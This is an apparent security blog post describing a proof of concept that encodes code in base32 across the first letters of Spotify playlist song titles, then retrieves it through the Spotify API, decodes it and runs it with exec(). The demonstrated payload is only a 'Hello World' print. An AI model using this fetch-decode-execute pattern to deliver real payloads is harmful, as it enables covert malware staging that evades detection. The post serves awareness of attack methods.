Contents

Malicious Code in Spotify Playlists

Updated on 2021-08-16

Introduction

The other day I read a very interesting blog, it showed me how one could potentially encode malicious code within Spotify playlists and run this code using the Spotify API; essentially using Spotify as a CDN. I found this very interesting and since the blog did not feature a fully implemented PoC I decided to make my own.

Purpose

The purpose of this is purely educational and to raise awareness of different attack methods a bad actor may potentially use, I strongly advice against using this code for purposes other than those intended.

How it works

Generating Payload

The data here is stored within the song titles of the playlists, specifically in the first letter of each song. To make sure our data fits here and has all characters typically used within song titles we convert our data into base32 (We don’t use base64 as it contains characters not typically found in songs), with this encoded data we add songs titles for each letter, let us consider the PoC.

1
2
3
4
5
6
7
import base64  

str = "print('Hello World')"      
b32_str = base64.b32encode(bytearray(str, 'ascii')).decode('utf-8')

print(b32_str)

The above code returns the value, OBZGS3TUFATUQZLMNRXSAV3POJWGIJZJ

Playlist

Here one can easily write a script to automatically create a playlist that could hold the base32 output, below is the PoC Playlist,

As you can see taking the first letter of each song in the order presented would give us our payload.

Extracting

Now one just has to write code to read the songs in the playlist, take the first letter in each song title, decode and execute the payload. Below is a part of the PoC available on Github here,

1
2
3
4
5
6
7
for song in songs:
	base32 = base32 + song.get("track").get("name")[0]    # Get first letter from each song

base32 = base32.upper()                                 # make all letters uppercase
code = base64.b32decode(base32).decode("utf-8")         # decode from b32 to string

exec(code)	                                          	# execute code

The above code takes the first letter of every song in the playlist and decodes it from base32 into a string, this string is our malicious code which is then executed. The result of this is,

Output

To run the code one must have APIs keys from Spotify, these can be found here. After receiving both the keys make sure you authorize your client by running the following in a terminal,

For Windows
1
2
set SPOTIPY_CLIENT_ID='your-spotify-client-id'
set SPOTIPY_CLIENT_SECRET='your-spotify-client-secret'
For Mac/Linux
1
2
export SPOTIPY_CLIENT_ID='your-spotify-client-id'
export SPOTIPY_CLIENT_SECRET='your-spotify-client-secret'

Limitations

  • This method however would be limited by the song limit Spotify has on playlists (10,000 songs)

Conclusion

I hope you found this as interesting as I did, the blog where I read about this can be found here.